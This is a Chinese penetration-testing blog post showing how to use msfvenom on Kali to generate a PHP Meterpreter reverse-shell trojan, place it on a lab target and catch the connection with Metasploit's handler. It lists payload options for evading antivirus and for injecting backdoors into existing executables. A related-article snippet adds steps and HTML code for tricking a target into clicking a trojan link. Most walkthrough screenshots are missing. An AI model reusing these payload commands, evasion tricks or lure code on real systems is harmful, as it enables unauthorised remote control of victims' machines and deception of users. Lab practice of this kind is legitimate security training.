kali 生成PHP木马病毒进行靶机控制

已于 2024-10-17 09:01:32 修改
阅读量1.5k 收藏 28
点赞数 24
分类专栏: 渗透测试 文章标签: web安全 网络安全
于 2024-10-17 08:52:24 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/chidaoqiannianzq/article/details/142976737
版权

Msfvenom 是 Metasploit Framework 的一个非常强大的工具,它结合了之前 msfpayload 和 msfencode 的功能,用于生成各种类型的 Payloads,包括但不限于 shellcode、恶意文件、恶意链接等。Msfvenom 可以帮助渗透测试人员创建自定义的 Payloads,以用于渗透测试、漏洞利用和红队行动中。

Msfvenom 的主要功能包括:

  1. 生成后门:Msfvenom 可以用来生成后门软件,这些后门在目标机上执行后,可以在本地监听上线,实现对目标机器的控制。
  2. 支持全平台:Msfvenom 支持多种操作系统,包括 Windows、Linux、macOS、Android 等。
  3. 自定义 Payload:用户可以根据自己的需求,定制化生成 Payload,包括设置特定的 Payload 类型、编码器、架构、平台等。
  4. 编码和避过检测:Msfvenom 还可以用来对 Payload 进行编码,以避免被防病毒软件检测到。

以下是 Msfvenom 的一些基本参数和它们的使用说明:

  1. -p--payload:指定使用的 Payload,例如 windows/meterpreter/reverse_tcp。这是生成 Payload 时必须指定的参数。

    • 例子:msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP> LPORT=<Port> -f exe -o payload.exe

-f--format:指定输出格式,如 exeelfaspx 等。这个参数决定了生成的 Payload 文件类型。

  • 例子:msfvenom -p windows/meterpreter/reverse_tcp -f exe -o payload.exe

-e--encoder:指定编码器,用于编码 Payload 以绕过某些安全检测,如 x86/shikata_ga_nai

  • 例子:msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai LHOST=<IP> LPORT=<Port> -f exe -o payload.exe

-a--arch:指定目标系统的架构,如 x86x64

  • 例子:msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=<IP> LPORT=<Port> -f exe -o payload.exe

--platform:指定目标平台,如 windowslinux

  • 例子:msfvenom -platform windows -a x86 -p windows/meterpreter/reverse_tcp LHOST=<IP> LPORT=<Port> -f exe -o payload.exe

-o--out:指定输出文件的路径和名称。

  • 例子:msfvenom -p windows/meterpreter/reverse_tcp -f exe -o payload.exe

-b--bad-chars:指定需要避免的字符,这些字符可能会导致 Payload 在某些环境中无法正常执行。

  • 例子:msfvenom -p windows/meterpreter/reverse_tcp -b '\x00\xff' LHOST=<IP> LPORT=<Port> -f exe -o payload.exe

-i--iterations:指定编码 Payload 的次数,增加编码次数可以提高 Payload 的隐蔽性,但可能会增加文件大小。

  • 例子:msfvenom -p windows/meterpreter/reverse_tcp -i 3 LHOST=<IP> LPORT=<Port> -f exe -o payload.exe

-x--template:指定一个现有的可执行文件作为模板,将 Payload 注入到该文件中。

  • 例子:msfvenom -p windows/meterpreter/reverse_tcp -x /path/to/template.exe -k LHOST=<IP> LPORT=<Port> -f exe -o payload.exe

  1. -k--keep:保持模板文件的行为,并将 Payload 注入为一个新线程。

这些参数可以组合使用,以生成适合特定渗透测试场景的 Payload。例如,如果你需要生成一个 Windows 平台的 Meterpreter 反向 TCP Shell,并且希望输出为 exe 格式的文件,你可以使用以下命令:

 

bash
 

 

在实际使用中,你可能需要根据目标环境和安全要求调整这些参数。例如,为了绕过某些安全软件的检测,你可能会使用不同的编码器或避免使用特定的字符。通过熟练掌握这些参数,你可以更有效地利用 Msfvenom 进行渗透测试和安全评估。
 

 

使用msfvenom生成php木马文件
 

sfvenom -p php/meterpreter/reverse_tcp lhost=192.168.25.129 lport=4444 -f raw > /root/hacker.php
 

 

目标主机中安装phpstudy集成环境,并将木马文件放置在集成环境根目录
 

 

回到kali
 

进入msfconsole渗透测试模块
 

 

使用exploit/multi/handler模块进行攻击测试
 

 

设置相应参数
 

 

 

开启监听
 

 

回到靶机中运行php页面
 

 

我们可以看到攻击主机已经对靶机进行了监控
 

 

 

 

接下来可以按照个人需求进行进一步的利用靶机

                

        

    

  



    



                



	

		

			

				
					
[网络安全自学篇] 六十五.Vulnhub靶机渗透之环境搭建及JIS-CTF入门和蚁剑提权示例(一)

				
			

			

				

					杨秀璋的专栏
				

				

					04-10
					
					1万+
					
				

			

		

		

			
				
这是作者的网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您们喜欢,一起进步。前文分享了SMBv3服务远程代码执行漏洞(CVE-2020-0796),攻击者可能利用此漏洞远程无需用户验证,执行恶意代码并获取机器的完全控制。本文将详细讲解Vulnhub靶机渗透的环境搭建和JIS-CTF题目,采用Nmap、Dirb、中国蚁剑、敏感文件分析、SSH远程连接、Shell提权等获取5个flag。由于hack the box速度堪忧,作者选择了Vulnhub靶场,希望深入分析来

			
		

	



                

            
              



	

		

			

				
					
java 加载shellcode_MSF-Shellcode生成和使用

				
			

			

				

					weixin_29348211的博客
				

				

					02-26
					
					685
					
				

			

		

		

			
				
1使用环境Kali 2.0msfvenom2Msfvenom参数说明msfvenom –h 查看帮助说明:Options:-p, --payload  指定需要使用的payload(***荷载)。如果需要使用自定义的payload,请使用'-'或者stdin指定-l, --list [module_type] 列出指定模块的所有可用资源. 模块类型包括: ...

			
		

	



              


  
              

                


	

		

			

				
					
kali下Burpsuite对网站后台注入php木马

				
			

			

				

					qq_43776408的博客
				

				

					05-20
					
					2387
					
				

			

		

		

			
				
先给kali浏览器设置代理
后面输入你的端口号

打开后,先关闭拦截
因为i我们只要拦截重要的就行了
接下来打开浏览器
访问我们搭建的网站
这时在点击开始拦截就可以了

右键空白
send to repeater 送往中继器
因为中继器是可以改包的
然后你切换到Burp的中继器
你就在刚才那个界面上找,肯定能找到repeaterCHR是加密的,防止别查杀
%0a和%0d是回车和换行的,ASCII码
eval函数可以把一段字符串当作php代码运行
常用于黑客
一般杀毒软件过滤eval函数
CHR可以对eva.

			
		

	





	

		

			

				
					
msf生成木马

					
热门推荐

				
			

			

				

					liu_jia_liang的博客
				

				

					03-29
					
					1万+
					
				

			

		

		

			
				
Linux


  msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=< Your IP Address> LPORT=< Your Port to Connect On> -f elf > shell.elf

Windows


msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to 

			
		

	



		

			
		



	

		

			

				
					
木马免杀之MSFVenom制作木马

					
最新发布

				
			

			

				

					没有网络安全就没有国家安全
				

				

					03-09
					
					1950
					
				

			

		

		

			
				
木马免杀之MSFVenom制作木马

			
		

	





	

		

			

				
					
msf免杀木马生成

				
			

			

				

					qq_66985187的博客
				

				

					07-04
					
					2624
					
				

			

		

		

			
				
等黑客技术,所以难度很高,一般人不会或没能力接触这技术的深层内容。其内容基本上都是修改病毒、木马的内容改变特征码,从而躲避了杀毒软件的查杀。set payload windows/meterpreter/reverse_tcp#设置攻击位。本章是通过msf(msfvenom)命令实现免杀的操作。由于免杀技术的涉猎面非常广,其中包含反。简称"免杀",它指的是一种能使病毒木马免于被。补充:常见的后门生成方式!在kali生成常见的木马命令。

			
		

	





	

		

			

				
					
msfvenom 基本使用

				
			

			

				

					blackguest07的博客
				

				

					03-05
					
					1900
					
				

			

		

		

			
				
msfvenom 基础命令

			
		

	





	

		

			

				
					
msf渗透练习-php后门反弹

				
			

			

				

					weixin_49349476的博客
				

				

					06-09
					
					3268
					
				

			

		

		

			
				
php后门反弹,就是通过php的后门文件,对目标进行操控。本次使用msf完成(仅供学习)

			
		

	





	

		

			

				
					
网络安全技术新手入门 利用Kali Linux生成简单的远程控制木马_kali生成远程(1)

				
			

			

				

					m0_60750088的博客
				

				

					04-29
					
					703
					
				

			

		

		

			
				
最近很多小伙伴找我要Linux学习资料,于是我翻箱倒柜,整理了一些优质资源,涵盖视频、电子书、PPT等共享给大家!

			
		

	





	

		

			

				
					
kali生成木马

				
			

			

				

					Massimo__JAVA的博客
				

				

					04-25
					
					2308
					
				

			

		

		

			
				
攻击机:kali  192.168.116.128受害机:win7  192.168.116.124目标:使用kali

			
		

	





	

		

			

				
					
Kali Linux渗透测试小实践——Metasploit与后门木马

				
			

			

				

					PICACHU+++的博客
				

				

					01-08
					
					3158
					
				

			

		

		

			
				
Metasploit是一款开源的安全漏洞检测工具,可以帮助安全和IT专业人士识别安全性问题,验证漏洞的缓解措施,并管理专家驱动的安全性进行评估,提供真正的安全风险情报。这些功能包括智能开发,代码审计,Web应用程序扫描,社会工程。团队合作,在Metasploit和综合报告提出了他们的发现。

			
		

	





	

		

			

				
					
渗透测试 ( 2 ) --- 渗透测试系统、靶机、GoogleHacking、kali工具

				
			

			

				

					墨鱼菜鸡
				

				

					07-11
					
					2635
					
				

			

		

		

			
				
操作系统:https://zhuanlan.zhihu.com/p/162865015 
1、基于 Windows、Linux、Android 的渗透测试系统 
1.1 基于 Linux 的系统 
Kali:https://www.kali.org/get-kali/Parrot Security OS:Parrot Securitybackbox:ht...

			
		

	





	

		

			

				
					
msf 生成php马_msf系列篇章之msf的基础模块和命令

				
			

			

				

					weixin_39583013的博客
				

				

					11-21
					
					1033
					
				

			

		

		

			
				
1、 msf的基础介绍kali是默认集成了mepasploit framework,简称为msf,不同的框架下,它有不同的模块,不同的模块之间,互相交流彼此生产输入输出的数据,第一个模块生成的数据可以给第二个或者第三个模块去直接拿来使用,原因是它拿来使用的是后台有数据库,其它的版本后面也有数据库,比如说我们扫描的目标系统,扫描下来的信息,比如说开放了哪些端口,哪些信息,都会存到数据库里面,而mea...

			
		

	





	

		

			

				
					
Kali Linux渗透测试全程课与脚本语言编程系列课程

				
			

			

				

					09-29
				

			

		

		

			
				
一、课程概要         本课程主要分享分享Kali Linux渗透测试全程课与脚本语言编程系列课程! 二、课程目标          本课程致力于帮助广大学员掌握Kali Linux渗透测试与编程技巧! 三、适合人员         本课程适合兴趣计算机与网络安全技术的学员观看学习! 四、特别提醒         本课程支持一次购买,享受永久观看,欢迎大家选购!

			
		

	





	

		

			

				
					
MSF生成木马及木马的简单使用

				
			

			

				

					爱喝水的仙人树的博客
				

				

					11-03
					
					1万+
					
				

			

		

		

			
				
本文将介绍有关MSF木马模块的简单使用方式,介绍常见的几种木马生成方式,如有不对的地方,欢迎大家在评论区指正。由于本文仅对部分模块的简单使用进行说明,更多信息请参考官方网址MSFVENOM环境配置说明1. 使用kali虚拟机和Win7(可以低于此版本)虚拟机2. kali虚拟机建议使用最新版本并将系统软件更新至最新版本3. Win7虚拟机务必关闭网络防火墙,不建议使用Win7及以上版本系统,简单的木马会被直接删除4. 查看两台虚拟机的IP地址,确保两台虚拟机之间可以ping通。

			
		

	





	

		

			

				
					
msfvenom常用参数

				
			

			

				

					m0_61506558的博客
				

				

					08-29
					
					1789
					
				

			

		

		

			
				
列出指定模块的所有可用资源,模块类型包括: payloads, encoders, nops, all。例如:原先有个正常文件normal.exe 可以通过这个选项把后门捆绑到这个程序上面。例如:原先有个正常文件normal.exe 可以通过这个选项把后门捆绑到这个程序上面。设定有效攻击荷载的最大长度生成payload的最大长度,就是文件大小。保护模板程序的动作,注入的payload作为一个新的进程运行。指定需要使用的encoder(编码器)编码免杀。指定需要使用的payload(攻击荷载)。...

			
		

	





	

		

			

				
					
Msfvenom使用指南

				
			

			

				

					m0_57221101的博客
				

				

					02-08
					
					6364
					
				

			

		

		

			
				
参数总结

1. –p (- -payload-options)

添加载荷payload。

载荷这个东西比较多,这个软件就是根据对应的载荷payload生成对应平台下的后门,所以只有选对payload,再填写正确自己的IP,PORT就可以生成对应语言,对应平台的后门了!!!

(- -payload-options 列出payload选项)

2. –l

查看所有payload encoder nops。

3. –f (- -help-formats)

输出文件格式。

(- -help-form

			
		

	





	

		

			

				
					
kali生成木马的工具

				
			

			

				

					Ping_Pig的博客
				

				

					09-16
					
					7478
					
				

			

		

		

			
				
这里简单介绍kali下的两款工具,时间比较仓促,简单的说下,后面再继续更新一些详细内容

一款小巧的php后门工具:WeBaCoo

全名:Web Backdoor Cookie

简介:kali已经集成,产生终端性shell,编码类型通过http头传输,隐蔽性比较强

优缺点:方便简单,适合作为临时shell,没有密码,只能用于php

使用方法:


生成服务端程序

webacoo -g ...

			
		

	





	

		

			

				
					
kali linux生成木马链接,并让目标靶机点击

				
			

			

				

					09-30
				

			

		

		

			
				
Kali Linux是一款针对网络安全的Linux发行版,它主要用于渗透测试、漏洞分析以及黑客工具的使用。要在Kali Linux上生成木马链接诱使目标机器点击,通常需要使用一些Web开发技术和恶意软件技术,如Python的`requests`库配合PHP或HTML制作隐藏payload的网页。

以下是一个简单的步骤示例:

1. **创建木马脚本** (例如使用Python):
   使用`exploitdb`模块下载现成的恶意脚本,例如Metasploit框架的Payloads,或者编写自定义的木马代码,如通过msfvenom命令生成:

```shell
$ msfvenom -p windows/meterpreter/reverse_https LHOST=<your-lhost> LPORT=<your-lport> -f exe > payload.exe
```
   
2. **隐藏木马**:
   将木马文件嵌入到一个看似正常的HTML页面中,比如利用IFrame或JavaScript:

```html
<script>
function clickMalware() {
  window.open('data:text/html;base64,' + btoa('<img src="path/to/payload.exe">'));
}
</script>
<button onclick="clickMalware()">点击这里</button>
```

3. **部署链接**:
   将这个HTML文件上传至你的服务器,设置为目标网站的URL,然后发送给目标用户。

注意,这只是一个理论上的例子,实际操作中你需要考虑合法性和道德问题,同时保证遵守法律法规。

			
		

	



              




          




        



    





    



      

      

        
      

      





	

		评论	
	

	
	




  

    

      添加红包
      
    

    

      

        
        

          
          
        

        
请填写红包祝福语或标题

      

      

        
        

          
          
        

        
红包个数最小为10个

      

      

        
        

          
          
        

        
红包金额最低5元

      

      

        
        

          当前余额3.43前往充值 >
        

      

      

        

          需支付:10.00

        
        
      

    

  





  

    
    
  

  

    
    
  








  

    

      

        

          

            
            
成就一亿技术人!

          

          

        

        

          

          

            领取后你会自动成为博主和红包主的粉丝
            规则
          

        

      

      

        

          

            
              
            
            

              
hope_wisdom
 发出的红包
            

          

        

        

          

          

          

        

      

    

    

  





	
打赏作者

	

		

		
			
		
		

		

			
antique toy

			
你的鼓励将是我创作的最大动力

		

	

	

			

	

	

    ¥1
    ¥2
    ¥4
    ¥6
    ¥10
    ¥20
	

	

		

			

				

					扫码支付:¥1
				

				

					

					
					获取中
					

				

				

					
					
					扫码支付
				

			

		

		

			
您的余额不足,请更换扫码支付或充值

			
打赏作者

		

	



      
      

      
实付

      
使用余额支付

      

        

          

            
            点击重新获取
          

        

        
扫码支付

      

      

        
          
            
          
          
        
      

      

        
        钱包余额
          0
          

            
            

              

                
抵扣说明:

                
 1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
 2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

              

            

          

      

      余额充值